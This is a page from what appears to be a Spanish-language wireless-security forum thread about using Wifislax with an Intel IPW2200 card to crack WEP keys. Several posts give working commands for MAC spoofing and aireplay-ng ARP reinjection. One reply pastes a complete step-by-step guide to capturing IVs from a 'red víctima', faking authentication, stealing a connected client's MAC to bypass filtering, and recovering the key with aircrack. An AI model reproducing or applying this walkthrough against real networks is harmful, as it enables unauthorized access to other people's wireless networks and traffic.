Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación?
02-Diciembre 02:58:49 (Martes)
Inicio Ayuda Ingresar Registrarse

+  Seguridad Wireless
|-+  Suite Seguridad Wireless
| |-+  Live CD Wifislax (Moderadores: ChimoC, the_often, chinitiw)
| | |-+  Todos los post de WifiSlax + IPW 2200 en uno
Páginas: « 1 2 3 4 5 6 7 8 9 10 » Imprimir
Autor Tema: Todos los post de WifiSlax + IPW 2200 en uno  (Leído 69890 veces)
carsalta
*
Desconectado Desconectado

« Respuesta #240 en: 15-Mayo 22:30:53 (Martes) »

Puedes poner los comandos? ... Lo q te dice es q la red esta tirada ... con lo cual algo falla ...

No pongas direcciones mac

iwconfig eth1 essid "_______" channel 6 key 1111111111111
aireplay-ng -3 -b 00:......... -h 00:............ -i rtap0 eth1
uNbAs
Administrador
*

« Respuesta #241 en: 15-Mayo 22:39:34 (Martes) »

El comando esta bien ...

Pero, ¿no abres el airodump?

Otra cosa ... el A3 es para usar con un cliente conectado ... Si lo usas sin cliente ... no haras mucha cosa

Cada cosa en su sitio y un sitio para cada cosa

[Urge venta] Asus EeePC  (Poco uso y con Garantia)

[Urge venta]Cascos Audio Motorola S9
carsalta
*

« Respuesta #242 en: 15-Mayo 23:05:14 (Martes) »

El comando esta bien ...

Pero, ¿no abres el airodump?

Otra cosa ... el A3 es para usar con un cliente conectado ... Si lo usas sin cliente ... no haras mucha cosa

Si habro el airodump, pero el error me lo da despues de usar aireplay, gracias no sabia lo de -3.
uNbAs
Administrador
*

« Respuesta #243 en: 15-Mayo 23:14:07 (Martes) »

Hola, al final al darle muchas vueltas al tema y leerme todos los tutoriales, foros, videos etc.. he conseguido inyectar trafico con IPW2000, mi problema es que al abrir airodump, no suben los IVs en el AP que he seleccionado para inyectar, he conseguido hasta 9 ARPs pero creo que no inyecta o inyecta muy poco. Si alguien me resuelve esto seria de gran ayuda.

Un saludo.

Pues io aqui no veo ... q te de un error ... lo q te tienes q fijar es en la zona de #data del airodump ... los arp son imortantes ... pero los datas es en lo q mas te tienes q fijar

carsalta
*

« Respuesta #244 en: 16-Mayo 21:51:40 (Mircoles) »

Hola, al final al darle muchas vueltas al tema y leerme todos los tutoriales, foros, videos etc.. he conseguido inyectar trafico con IPW2000, mi problema es que al abrir airodump, no suben los IVs en el AP que he seleccionado para inyectar, he conseguido hasta 9 ARPs pero creo que no inyecta o inyecta muy poco. Si alguien me resuelve esto seria de gran ayuda.

Un saludo.

Pues io aqui no veo ... q te de un error ... lo q te tienes q fijar es en la zona de #data del airodump ... los arp son imortantes ... pero los datas es en lo q mas te tienes q fijar

Ya he solucionado el problema, lo unico que cuanto tiempo tarda en detectar ARPs? Cual es el tiempo medio en detectar 300000IVs?
uNbAs
Administrador
*

« Respuesta #245 en: 17-Mayo 15:53:37 (Jueves) »

Pues me alegro ... de q lo hayas solucionado!!!

Sobre la pregunta ... Por lo menos iop no soy capaz de contestarte ... el wifi no es una ciencia exacta ... es lo mas q te puedo decir ...  Grin

carsalta
*

« Respuesta #246 en: 17-Mayo 19:51:38 (Jueves) »

Pues me alegro ... de q lo hayas solucionado!!!

Sobre la pregunta ... Por lo menos iop no soy capaz de contestarte ... el wifi no es una ciencia exacta ... es lo mas q te puedo decir ...  Grin

Perdona si soy muy insistente, pero es que en 7 horas solo he conseguido 5 ARP, es normal? o he de tener mas paciencia?

Gracas.
uNbAs
Administrador
*

« Respuesta #247 en: 17-Mayo 23:03:23 (Jueves) »

Como te he dicho no es una ciencia exacta ... es posible q tengas problemas de cobertura, q el router sea mas duro q otros .... Esque depende de muchas cosas

Socram2k
*

« Respuesta #248 en: 21-Mayo 15:36:43 (Lunes) »

hola a todos, todavia no he podido reinyectar, pero desde windows, con el netstumbler, de 4 redes con clave wep, 3 me pone en vendor fake....he buscado en google, pero es mucho ingles para mi nivel. alguien me puede aclarar esto???
uNbAs
Administrador
*

« Respuesta #249 en: 21-Mayo 19:42:11 (Lunes) »

Las cosas de windows en windows este es un hilo especifico de wifislax y esa tarjeta ...

Porfavor hacer las cosas como deben de ser ... las cosas bien echas bien parecen

casaucao
*

« Respuesta #250 en: 22-Mayo 13:45:44 (Martes) »

uish uish...mi ipw2200 inyectando como una posesa, dónde sa visto eso??  Grin

a pesar de que con una WLAN_XX se necesita infinítamente menos paquetes, era tan solo para testear la inyección xD

gracias a todos por compartir semejante sabiduría XD
uNbAs
Administrador
*

« Respuesta #251 en: 22-Mayo 15:34:14 (Martes) »

Bueno entonces funciona ....  Grin Grin

Si quieres ver velocidades de reinyeccion en la zona de materiales hay un post con chincheta, de las velocidades maximas q algunos hemos conseguido ...  Grin Grin

Socram2k
*

« Respuesta #252 en: 23-Mayo 08:00:12 (Mircoles) »

Las cosas de windows en windows este es un hilo especifico de wifislax y esa tarjeta ...

Por favor hacer las cosas como deben de ser ... las cosas bien echas bien parecen
si, mi tarjeta es una ipw2200, y uso el wwifislax, pero ni es kismet ni ningún programa de esta suite me informaban de los de que el vendor es un fake, y quisiera saber si eso es algún momento a la hora de hacer la autoria......
uNbAs
Administrador
*

« Respuesta #253 en: 23-Mayo 14:44:34 (Mircoles) »

Por favor hacer las cosas como deben de ser ... las cosas bien echas bien parecen
si, mi tarjeta es una ipw2200, y uso el wwifislax, pero ni es kismet ni ningún programa de esta suite me informaban de los de que el vendor es un fake, y quisiera saber si eso es algún momento a la hora de hacer la autoria......

Lo siento ... no me di cuenta q hacias referencia ... Bueno pues lo del vendedor fake no es un problema simplemente creo q era q el netstumbler no lograba saber el fabricante ... Pero mi router me lo detecta como fake .. y he probado todos los ataques y wifislax contra el y nunca he tenido problemas  Grin Grin

bluedemon3160
*

« Respuesta #254 en: 24-Mayo 10:53:33 (Jueves) »

HolA OIGAN SOY NUEVO EN ESTO TENGO COMO 2 SEMANAS TRATANDO DE SACAR UNA WEP CON WIFISLAX 2.0 Y TARJETA WIRELESS IPW2200 Y EH SEGUIDO LOS COMANDOS QUE ME INDICAN TANTO PARA CUANDO HAY CLIENTE CONECTADO COMO PARA CUANDO NO LO HAY (CHOPCHOP) PERO LO MAS QUE E ALCANZADO A RECOPILAR DE DATA'S SON 180 EN 3 HORAS TAMBIEN EH HECHO LO DE LA REINYECCION CON AIREPLAY-NG PERO NO VEO QUE AUMENTE DONDE DICE #'S SOLO SUBE DE 1 A 2 O DE PLANO SE QUEDA EN 0 NO SE QUE HACER O COMO HACERLE SI ALGUIEN ME PUEDE ASESORAR LES AGRADECERIA, APARTE ESTOY EN UNA PARTE DONDE SEGUN ME DETECTA SEÑAL BAJA Y LA VELOCIDAD ES COMO DE 24MB ESO TENDRA ALGO QUE VER? PARA BUSCAR UN LUGAR DONDE DE LA SEÑAL COMPLETA ....LES AGRADECERIA SU APOYO YA QUE ME ESTOY TRAUMANDO CON ESTO QUE NO ME SALE JAJAJAJA BUENO GRACIAS Y ESPERO QUE ALGUIEN ME PUEDA RESOLVER ESTA DUDA
uNbAs
Administrador
*

« Respuesta #255 en: 24-Mayo 16:18:52 (Jueves) »

Primero porfavor no escribas en mayusculas ... es bastante molesto a parte de ser considerado chillar ...

El problema q tienes seguramente es por la cobertura, El ataque con cliente conectado ... se suele hacer un A3 ... no un CHOP-CHOP ... como dices ...

bluedemon3160
*

« Respuesta #256 en: 24-Mayo 20:32:32 (Jueves) »

hola unbas, bueno pimero perdon por las mayusculas no sabia que significara eso, oye y la cuestion es que osea si yo hago un ataque con cliente conectado uso el A3 pero cuando no hay cliente conectado uso el A4 o chopchop pero no reinyecta nada no aumentan los data's ,hoy voy a probar acercandome mas al AP aver si asi jala pero tambien queria preguntar, cuando te asocias al AP te deve de marcar asociascion succesfully o en el IPW2200 no hace eso porque siempre me pone algo asi como que request denied, y tambien queria saber si en el WifiSlax 2.0 nadamas se iserta el live cd (usando IPW2200)  y se empieza a hacer el proceso para sacar la WEP o se tiene que iniciar la tarjeta wireless o algo asi?
gracias 
casaucao
*

« Respuesta #257 en: 24-Mayo 21:21:02 (Jueves) »

inicias el wifislax, abres una consola y a buscar objetivos. una vez elegido tu ap, te asocias (cambias mac) mediante

iwconfig eth1 essid "ESSID" channel "CANAL" key 11111 (por ejemplo)

para ver si te has asociado correctamente:

iwconfig (y te dice not associated, sino lo estás, o ieee802, si lo estás xd)

si estás asociado, airodumpg al canto, y ya airplay según te convenga. cuanto más cerca del ap, mejor.

pa cambiar mac, q se me ha olvidao

ifconfig eth1 up hw ether 00:11:22:33:44:55 (first of all xd)
« Última modificación: 24-Mayo 21:27:55 (Jueves) por casaucao » En línea
bluedemon3160
*

« Respuesta #258 en: 24-Mayo 22:41:45 (Jueves) »

oye casaucao si cuando me asocio al AP me pone not asociated a que se devera? sera porque esty un poco lejos del ap y no tengo buena señal o ay que reintentarle hasta que se asocie? el AP es un 2wire de infinitum ayudame please Wink
casaucao
*

« Respuesta #259 en: 24-Mayo 22:47:01 (Jueves) »

una de las causas puede deberse a eso, a que estés demasiado lejos. Si tienes más ap's prueba asociarte a algunos de los que piyes más señal.

prueba poner:

iwconfig eth1 rate 1M (iwconfig?? o ifconfig?? ké memoria la mía :S)
balconconb
*

« Respuesta #260 en: 29-Mayo 13:05:59 (Martes) »

Hola, en primer lugar quiero agradecer a todos los que han creado esta web su esfuerzo y trabajo. En segundo lugar quiero decir que soy un completo novato XD
Tengo dos problemas:
El administrador de dispositivos de Windows me dice que tengo la tarjeta Intel(R) PRO/Wireless 220BG Network Conecction, sin embargo cuando entro en wifislax dice que tengo la IPW2100. ¿Cómo es eso?

¿Hay algún manual escrito muy sencillo como el que había antes para Backtrack? ¿Sirve este mismo manual para el wifislax? Con backtrack he conseguido sacar la contraseña de la red de un amigo desde su ordenador y me gustaría poder hacerlo desde mi portátil (soy un novato completamente así que si podéis explicarlo sencillito gracias)

Lo primero es sacar los datos necesarios de la red víctima (utilizar kismet o airodump):
BSSID : MAC del AP (XX:XX:XX:XX:XX:XX)
ESSID : Nombre de la red
CHANNEL : Canal de emisión (1,2,3,4,5,6,7,8,9,10,11,12)
STATION : MAC de un cliente de la red (XX:XX:XX:XX:XX:XX)
Ahora tenemos que inicializar la tarjeta wireless de nuestro ordenador. En nuestro ejemplo ath0 (para saber el nombre de la tarjeta usamos iwconfig):
airmon.sh start ath0
 entramos en el airodump :
airodump ath0 pruebas 0 1
donde ath0 es la tarjeta, pruebas es el archivo donde se guardan las capturas, 0 es el canal (al escribir 0 indicamos que busque en todos) y 1 indica que sólo se guarden los IVs, para ahorrar espacio en disco o en memoria.
Miramos cuál es el nombre de la red WEP víctima y apuntamos el BSSID, ESSID, CHANNEL y STATION (si la hay). Entonces pulsamos Control+C y escribimos y pasamos al modo grafico con el comando : startx
Abrimos una consola y ponemos :
iwconfig ath0 mode monitor channel CHANNEL essid ESSID
airmon.sh start ath0 CHANNEL
airodump ath0 pruebas CHANNEL 1
Ahora esperamos a que el DATA aumente (como mínimo necesitaremos 250.000 Ivs). Hay varias formas de que aumente el número rápidamente:
 Acelerar el proceso cuando hay alguien conectado.
Los DATA o IVS suben muy lentos. Para que suban más rápido debemos usar aireplay:
aireplay -3 ath0 -b BSSID -h STATION
Hacer que haya proceso o acelerarlo cuando no hay "Station" (Cliente), es decir, nadie conectado.

A veces ni siquiera van a subir los DATA ni vamos a tener nada en la lista de abajo que tenga que ver con nuestra red. Esto se soluciona de la siguiente manera. Primero abrimos otra ventana y luego ponemos:
aireplay -1 30 ath0 -e ESSID -a BSSID -h 00:11:22:33:44:55
Si al final de este comando nos pone “association successful” lo hemos hecho bien, pero esa ventana no la cerramos porque va a seguir enviando datos cada 30 segundos. (Si nos da algún problema escribimos: iwconfig ath0 rate 1M essid ESSID).
Abrimos una nueva ventana de comandos y escribimos :
aireplay -3 ath0 -b BSSID -h 00:11:22:33:44:55 -x 300
Si sale bien veremos que cuando lleve cierto número de READ empezarán a aumentar ARP y SENT. Además en el airodump veremos que los DATA empiezan a subir. Si no hemos conseguido association succesfully es porque el router tiene filtro de MAC y deberiamos esperar hasta q se conecte un cliente para pòder robarle su MAC y repetir de nuevo el proceso.
Cuando tengamos sobre 250.000 abrimos otra ventana de comandos y escribimos :
aircrack pruebas*.ivs
Con un poco de suerte debería aparecer la clave aunque a veces se pueden llegar a necesitar hasta 4 millones de IVs (DATA o IVS). (Como curiosidad, las redes que son del estilo "PACO 27",en aireplay quedarían así : -e PACO\ 27)

Saludos
rh3nt0n
Administrador
*

" si, vis pacem , para bellum "

« Respuesta #261 en: 29-Mayo 14:25:51 (Martes) »

*balconconb
Lo unico que necesitas es leer el foro y usar el buscador , tus dudas estan todas resueltas .

Como reza una campaña de trafrico muy famosa :

"No podemos conducir por ti "

Lee , y resuelve tus dudas por ti mismo , es mas gratificante Wink

salu2

"No se trata de romper ventanas ni farolas... ni de cara; mejor romper conciencias equivocadas"
balconconb
*

« Respuesta #262 en: 29-Mayo 15:36:42 (Martes) »

*balconconb
Lo unico que necesitas es leer el foro y usar el buscador , tus dudas estan todas resueltas .

salu2
Yo me salto las normas como Aznar (sino sabes de lo que hablo mira en youtube) XD
Ahora en serio, mirar he mirado pero no me entero mucho Sad
Que alguien me responda al menos la 1ª y si sirve el mismo manual q para el backtrack. Soy muy inútil  Cry
Mil perdones
rh3nt0n
Administrador
*

" si, vis pacem , para bellum "

« Respuesta #263 en: 29-Mayo 17:24:23 (Martes) »

*balconconb

salu2
Yo me salto las normas como Aznar (sino sabes de lo que hablo mira en youtube) XD
Que alguien me responda al menos la 1ª y si sirve el mismo manual q para el backtrack. Soy muy inútil  Cry
Mil perdones

1º ... corriendo wifislax , en una consola haz :

Código:
dmesg | grep ipw

y pegas la salida del comando en un nuevo post .

2º ... SI , te vale e manual de back|track , solo que la interfaz no sera ath0 , si no ethx

salu2

"No se trata de romper ventanas ni farolas... ni de cara; mejor romper conciencias equivocadas"
balconconb
*

« Respuesta #264 en: 29-Mayo 17:43:29 (Martes) »

*balconconb

salu2
Mil perdones

1º ... corriendo wifislax , en una consola haz :

Código:
dmesg | grep ipw

y pegas la salida del comando en un nuevo post .

2º ... SI , te vale e manual de back|track , solo que la interfaz no sera ath0 , si no ethx

salu2

OK gracias, en mi caso es eth1
Y perdona por ser un n00b  Wink
rhrueda
*

« Respuesta #265 en: 01-Junio 10:13:28 (Viernes) »

Y que alguien haga lo mismo para la live-cd wifislax con zd1211!!!  Wink
Buen resumen!
carsalta
*

« Respuesta #266 en: 01-Junio 13:49:03 (Viernes) »

una de las causas puede deberse a eso, a que estés demasiado lejos. Si tienes más ap's prueba asociarte a algunos de los que piyes más señal.

prueba poner:

iwconfig eth1 rate 1M (iwconfig?? o ifconfig?? ké memoria la mía :S)

A mi me pasa solo con algunos APs, y problema de cobertura no es, ¿Alguien sabe a que es debido?

uNbAs
Administrador
*

« Respuesta #267 en: 01-Junio 15:04:00 (Viernes) »

Y el post de la ipw2200 ¿para q esta? con lo q me costo .... llegar a juntar las primeras paginas .... ains ... Lo dejo aqui unos dias y cuando lo vean lo pego al post de la ipw

vanlic43
*

"No estoy loco solo soy mentalmente divergente"

« Respuesta #268 en: 06-Junio 11:46:20 (Mircoles) »

Huh Hola mui buenas a todos los compañeros IPW2200!
Despues de hacerme con una clave wep en xp con comview y tardando unos 15 dias y sin inyectar ni na pues me baje el wifislax y la verdad es que esta muy bien y quisiera agradecer todo ese trabajo!

Bueno mi duda es ¿porque no me puedo asociar a una red sin trafico?
Hago lo de: iwconfig essid <<nombre>> key <<key>>
Despues:    iwconfig
Y la respuesta es siempre la misma:UNASSOCIATED!               

no se si son problemas de cobertura o no se...

Venga Graciñas!
uNbAs
Administrador
*

« Respuesta #269 en: 06-Junio 16:17:35 (Mircoles) »

tienes q poner iwconfig (interfaz) essid (blabla) key (tumismo)

vanlic43
*

« Respuesta #270 en: 06-Junio 18:26:58 (Mircoles) »

Tienes mucha razon lo que pasa es que se me pasó ponerla aqui en el post  Undecided
pero si la pongo en el terminal!
Lo que pregunto es si lo de asociarse va por señal de red o como?
uNbAs
Administrador
*

« Respuesta #271 en: 06-Junio 18:38:41 (Mircoles) »

No va por nada, Nisiquiera envias paquetes al router haciendo eso, lo q consigues con eso es fijar un el objetivo, para q la tarjeta no se confunda (Opinion personal)

vanlic43
*

« Respuesta #272 en: 06-Junio 19:06:07 (Mircoles) »

Lo unico que hace al no estar asociado es capturar beacons y algun que otro paquete cada 10 minutos!
kapitanklamoxil
*

« Respuesta #273 en: 08-Junio 01:05:20 (Viernes) »

Hola, estoy probando el wifislax en mi centrino, en el que tengo una ipw2200.
Para ello configuré un router smc con clave wep de 128. El router no lo tengo conectado a la red de internet.
La cuestión es que con windows, el network Stumbler me detecta perfectamente la red de dicho router. Pero cuando hago los pasos anteriores en Linux ,que posteo glomicilina, me sale lo siguiente al intentar asociarme:

eth0   radio off  essid: "hostguep"
          Mode: managed frequency: 2.467 GHz Access point: Not-Associated
          Bit Rate: 0 kb/s  Tx-Power=off  Sensitivity = 8/0
           etcetera, etcetera...

¿que me falta?
Hay que configurar antes algo en la tarjeta???

Saludos.

uNbAs
Administrador
*

« Respuesta #274 en: 08-Junio 01:48:02 (Viernes) »

Mira el post q pone todos los post de wifislax +ipw2200 ... tienes lo mismo pero mas simplificado ...

kapitanklamoxil
*

<
« Respuesta #275 en: 08-Junio 23:28:17 (Viernes) »